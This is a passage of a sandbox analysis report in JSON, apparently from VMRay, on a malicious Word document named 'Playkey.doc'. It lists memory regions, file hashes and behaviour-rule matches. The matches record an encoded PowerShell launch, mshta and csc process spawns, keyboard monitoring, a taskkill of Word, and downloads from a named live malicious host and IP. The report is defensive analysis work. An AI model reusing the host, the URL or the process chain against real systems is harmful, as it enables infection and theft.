"\\Windows\\System32\\msctf.dll", "id": "region_2016", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791788683264, "timestamp": "00:01:23.616", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791790452736, "type": "region", "version": 1 }, "end_va": 8791790579711, "entry_point": 8791790477544, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_2017", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791790452736, "timestamp": "00:01:23.616", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791790583808, "type": "region", "version": 1 }, "end_va": 8791791480831, "entry_point": 8791790716768, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_2018", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791790583808, "timestamp": "00:01:23.617", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 8791791501312, "type": "region", "version": 1 }, "end_va": 8791791534079, "entry_point": 8791791506692, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_2019", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 
8791791501312, "timestamp": "00:01:23.617", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791791566848, "type": "region", "version": 1 }, "end_va": 8791791988735, "entry_point": 8791791611964, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_2020", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791791566848, "timestamp": "00:01:23.617", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791792025600, "type": "region", "version": 1 }, "end_va": 8791792848895, "entry_point": 8791792527476, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_2021", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791792025600, "timestamp": "00:01:23.618", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2691071, "entry_point": 0, "filename": null, "id": "region_2022", "name": "pagefile_0x0000000000290000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2686976, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the 
configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 2756607, "entry_point": 0, "filename": null, "id": "region_2023", "name": "pagefile_0x00000000002a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2752512, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 28311552, "type": "region", "version": 1 }, "end_va": 28835839, "entry_point": 0, "filename": null, "id": "region_2024", "name": "private_0x0000000001b00000", "norm_filename": null, "region_type": "private_memory", "start_va": 28311552, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 28835840, "type": "region", "version": 1 }, "end_va": 29622271, "entry_point": 28835840, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_2025", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 28835840, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 29884416, "type": "region", "version": 1 }, "end_va": 30408703, "entry_point": 0, "filename": null, "id": "region_2026", "name": "private_0x0000000001c80000", "norm_filename": null, "region_type": 
"private_memory", "start_va": 29884416, "timestamp": "00:01:23.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 31653888, "type": "region", "version": 1 }, "end_va": 32178175, "entry_point": 0, "filename": null, "id": "region_2027", "name": "private_0x0000000001e30000", "norm_filename": null, "region_type": "private_memory", "start_va": 31653888, "timestamp": "00:01:23.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791614357504, "type": "region", "version": 1 }, "end_va": 8791614418943, "entry_point": 8791614362064, "filename": "\\Windows\\System32\\wbem\\wbemprox.dll", "id": "region_2028", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\system32\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 8791614357504, "timestamp": "00:01:23.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 548864, "start_va": 8791615864832, "type": "region", "version": 1 }, "end_va": 8791616413695, "entry_point": 8791615930320, "filename": "\\Windows\\System32\\wbemcomn.dll", "id": "region_2029", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\system32\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 8791615864832, "timestamp": "00:01:23.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", 
"permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791754276864, "type": "region", "version": 1 }, "end_va": 8791754338303, "entry_point": 8791754280976, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_2030", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791754276864, "timestamp": "00:01:23.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791770071040, "type": "region", "version": 1 }, "end_va": 8791770697727, "entry_point": 8791770078224, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_2031", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791770071040, "timestamp": "00:01:23.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092866560, "type": "region", "version": 1 }, "end_va": 8796092874751, "entry_point": 0, "filename": null, "id": "region_2032", "name": "private_0x000007fffffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092866560, "timestamp": "00:01:23.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 249856, "start_va": 8791754997760, "type": "region", "version": 1 }, "end_va": 8791755247615, "entry_point": 8791755004148, 
"filename": "\\Windows\\System32\\winsta.dll", "id": "region_2033", "name": "winsta.dll", "norm_filename": "c:\\windows\\system32\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 8791754997760, "timestamp": "00:01:23.708", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 30539776, "type": "region", "version": 1 }, "end_va": 31064063, "entry_point": 0, "filename": null, "id": "region_2034", "name": "private_0x0000000001d20000", "norm_filename": null, "region_type": "private_memory", "start_va": 30539776, "timestamp": "00:01:23.782", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 32178176, "type": "region", "version": 1 }, "end_va": 35123199, "entry_point": 32178176, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_2035", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 32178176, "timestamp": "00:01:23.782", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791744839680, "type": "region", "version": 1 }, "end_va": 8791745130495, "entry_point": 8791744843876, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_2036", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791744839680, "timestamp": "00:01:23.783", "type": 
"region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791747985408, "type": "region", "version": 1 }, "end_va": 8791748079615, "entry_point": 8791747998392, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_2037", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791747985408, "timestamp": "00:01:23.783", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 8791755259904, "type": "region", "version": 1 }, "end_va": 8791755341823, "entry_point": 8791755264224, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_2038", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 8791755259904, "timestamp": "00:01:23.784", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092858368, "type": "region", "version": 1 }, "end_va": 8796092866559, "entry_point": 0, "filename": null, "id": "region_2039", "name": "private_0x000007fffffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092858368, "timestamp": "00:01:23.784", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 } ], "remarks": { "critical": [], "non_critical": [ { "comment": "The 
maximum number of dumps was reached during the analysis. Some memory dumps may be missing in the reports. You can increase the limit in the configuration.", "id": 2048, "type": "remark", "version": 1 }, { "comment": "The dump total size limit was reached during the analysis. Some memory dumps may be missing in the reports. You can increase the limit in the configuration.", "id": 512, "type": "remark", "version": 1 } ], "type": "remarks", "version": 1 }, "sample_details": { "filename": "Playkey.doc", "id": 19989, "md5_hash": "9587a58c5d456ca4fb8d8abba0945861", "sample_type": "word_document", "sha1_hash": "18bb1da68d2073efb52ce3792311b15e958d85a5", "sha256_hash": "7a641c8fa1b7a428bfb66d235064407ab56d119411fbaca6268c8e69696e6729", "size": 1011599, "type": "sample_details", "version": 1 }, "screenshots": [ { "screenshot_archive_path": "screenshots/screenshot_0.png", "size": 59071, "thumbnail_archive_path": "screenshots/thumbnail_0.png", "timestamp": "00:00:00.000", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_38930.png", "size": 170024, "thumbnail_archive_path": "screenshots/thumbnail_38930.png", "timestamp": "00:00:38.930", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_65059.png", "size": 168680, "thumbnail_archive_path": "screenshots/thumbnail_65059.png", "timestamp": "00:01:05.059", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_75192.png", "size": 142839, "thumbnail_archive_path": "screenshots/thumbnail_75192.png", "timestamp": "00:01:15.192", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_76314.png", "size": 207882, "thumbnail_archive_path": "screenshots/thumbnail_76314.png", "timestamp": "00:01:16.314", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_78327.png", "size": 144150, "thumbnail_archive_path": "screenshots/thumbnail_78327.png", 
"timestamp": "00:01:18.327", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_80407.png", "size": 143235, "thumbnail_archive_path": "screenshots/thumbnail_80407.png", "timestamp": "00:01:20.407", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_85468.png", "size": 949344, "thumbnail_archive_path": "screenshots/thumbnail_85468.png", "timestamp": "00:01:25.468", "type": "screenshot", "version": 1 } ], "type": "summary", "version": 1, "vm_and_analyzer_details": { "adobe_acrobat_reader_version": "not_installed", "analyzer_build_date": "2017-10-17 16:08", "analyzer_version": "2.2.0", "chrome_version": "59.0.3071.115", "firefox_version": "25.0", "flash_version": "10.3.183.90", "internet_explorer_version": "8.0.7601.17514", "java_version": "7.0.710", "microsoft_excel_version": "16.0.4266.1003", "microsoft_office_version": "16.0.4266.1003", "microsoft_power_point_version": "16.0.4266.1003", "microsoft_project_version": "16.0.4266.1003", "microsoft_publisher_version": "16.0.4266.1003", "microsoft_visio_version": "16.0.4266.1003", "microsoft_word_version": "16.0.4266.1003", "silverlight_version": "not_installed", "type": "vm_and_analyzer_details", "version": 1, "vm_architecture": "x86_64-bit", "vm_kernel_version": "6.1.7601.17514_(3844dbb9-2017-4967-be7a-a4a2c20430fa)", "vm_name": null, "vm_os": "windows_7" }, "vti": { "type": "vti", "version": 1, "vti_built_in_rules_version": "2.6", "vti_rule_matches": [ { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Global\\.net clr networking", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_102", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], 
"rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Global\\.net clr networking\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [ { "ip_address": "185.211.244.133", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_request_dns", "operation_desc": "Perform DNS request", "ref_gfncalls": [ { "ref_id": "gfn_139", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_request_dns_by_name", "technique_desc": "Resolve host name \"www.samyrai777m.p-host.in\".", "technique_path": "built_in._network._request_dns.vmray_request_dns_by_name", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_184", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"\"C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.cmdline\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": 
"_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_195", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\System32\\mshta.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Local\\!PrivacIE!SharedMemory!Mutex", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_433", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Local\\!PrivacIE!SharedMemory!Mutex\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1416", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe\".", "technique_path": 
"built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_device", "category_desc": "Device", "operation": "_hook_keyboard", "operation_desc": "Monitor keyboard input", "ref_gfncalls": [ { "ref_id": "gfn_1907", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_hook_key_by_keystate_api", "technique_desc": "Frequently read the state of a keyboard key by API.", "technique_path": "built_in._device._hook_keyboard.vmray_hook_key_by_keystate_api", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_4325", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"\"C:\\Windows\\system32\\taskkill.exe\" /f /im winword.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_execute_encoded_powershell_script", "operation_desc": "Execute encoded PowerShell script", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_encoded_powershell_script", "technique_desc": "Execute encoded PowerShell script to possibly 
hide malicious payload.", "technique_path": "built_in._process._execute_encoded_powershell_script.vmray_execute_encoded_powershell_script", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_connect", "operation_desc": "Connect to remote host", "ref_gfncalls": [ { "ref_id": "gfn_142", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_tcp_out_connection", "technique_desc": "Outgoing TCP connection to host \"185.211.244.133:80\".", "technique_path": "built_in._network._connect.vmray_tcp_out_connection", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"www.samyrai777m.p-host.in/t/tp.php?thread=0\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 } ], "vti_rule_type": "Documents", "vti_score": 96 }, "yara": { "apply_yara": true, "apply_yara_on_created_files": true, "apply_yara_on_modified_files": true, "apply_yara_on_pcap_file": true, "apply_yara_on_process_dumps": true, "apply_yara_on_sample_files": true, "match_count": 0, "matches": [], "ruleset_count": 7, "type": "yara", "version": 1 } }